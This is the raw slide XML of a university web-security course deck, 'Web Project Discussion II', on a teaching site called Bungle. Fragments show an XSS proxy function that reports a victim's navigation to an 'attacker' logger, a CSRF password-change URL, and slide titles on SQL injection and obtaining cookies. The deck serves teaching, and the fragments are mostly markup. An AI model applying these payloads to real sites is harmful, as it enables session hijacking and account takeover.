              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>        }); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>    }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5135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838200" y="228600"/>
            <a:ext cx="662940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dirty="0" smtClean="0"/>
              <a:t>function proxy(attacker, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>        $("html").load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>            $("html").show();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0" smtClean="0"/>
              <a:t>            log(attacker, {event: "nav", uri: href});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>            $("#query").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>        }); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3337143"/>
            <a:ext cx="8229600" cy="278902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This is a wrapper function calling $(“html”).load()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is $().load()?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://api.jquery.com/load/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other interesting functions: .show() and .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()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5188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Think about current capabilities of this code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reports to adversary when user goes to this URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Makes a console log (useful for debugging)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hides the html until everything is ready</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writes into #query field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29174731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Summary (cont.)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Also, think about what this code is missing from the requirements for 2.2.3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What kind of harm did this code do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How about duration of the attack?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What happens if user clicks on a Bungle banner on top left corner? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What happens if user logs in with his/her account?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3666253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1986"/>
            <a:ext cx="8229600" cy="828304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="149733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3554095" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="5" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546950" y="1600263"/>
            <a:ext cx="8050022" cy="452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799431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1986"/>
            <a:ext cx="8229600" cy="828304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="149733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3554095" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="5" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546950" y="1600263"/>
            <a:ext cx="8050022" cy="452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6506031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57200" y="431986"/>
            <a:ext cx="8229600" cy="828304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="149733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3554095" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="5" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546950" y="1600263"/>
            <a:ext cx="8050022" cy="452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" y="2362200"/>
            <a:ext cx="8382000" cy="1077595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8382000" h="1077595">
                <a:moveTo>
                  <a:pt x="0" y="1077214"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8382000" y="1077214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8382000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1077214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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2362200"/>
            <a:ext cx="8382000" cy="1077595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="8255" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="78105">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="65"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…/?password_new=&lt;password&gt;&amp;password_conf</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="78105">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>=&lt;password&gt;&amp;Change=Change#</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin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96043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758" y="475107"/>
            <a:ext cx="822960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5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>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6950" y="1600263"/>
            <a:ext cx="8050022" cy="452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2649370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4159758" y="475107"/>
            <a:ext cx="822960" cy="7118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400" spc="-55" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SS</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri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546950" y="1600263"/>
            <a:ext cx="8050022" cy="452589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207765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199</TotalTime>
  <Words>1569</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>233</Paragraphs>
  <Slides>44</Slides>
  <Notes>2</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>사용한 글꼴</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>5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44</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="50" baseType="lpstr">
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Web Application Security Discussion</vt:lpstr>
      <vt:lpstr>Introducing Bungle</vt:lpstr>
      <vt:lpstr>Implementing Bungle</vt:lpstr>
      <vt:lpstr>Review</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>SQL Injection (cont.)</vt:lpstr>
      <vt:lpstr>SQL Injection Protection?</vt:lpstr>
      <vt:lpstr>SQL Injection Protection?</vt:lpstr>
      <vt:lpstr>SQL Injection Protection?</vt:lpstr>
      <vt:lpstr>Prepared Statements (PHP example)</vt:lpstr>
      <vt:lpstr>Approaching 2.2.1.3</vt:lpstr>
      <vt:lpstr>Escaping and Hashing</vt:lpstr>
      <vt:lpstr>Similar examples</vt:lpstr>
      <vt:lpstr>Imagine you have an input x.</vt:lpstr>
      <vt:lpstr>Shortening the injection string</vt:lpstr>
      <vt:lpstr>SELECT * FROM users WHERE username=’$username’ and pw=‘ &lt;str1&gt;’OR‘&lt;str2&gt; ’</vt:lpstr>
      <vt:lpstr>Understanding Token Validation</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Understanding CSRF Defense (cont.)</vt:lpstr>
      <vt:lpstr>Recap: We know how to obtain cookie info!</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Framework code</vt:lpstr>
      <vt:lpstr>Dissecting the source code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Summary</vt:lpstr>
      <vt:lpstr>Summary (cont.)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Web Project Discussion II</dc:title>
  <dc:creator>Hyun Bin Lee</dc:creator>
  <cp:lastModifiedBy>Hyun Bin Lee</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-24T17:14:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-15T21:10:08Z</dcterms:modified>
</cp:coreProperties>
</file>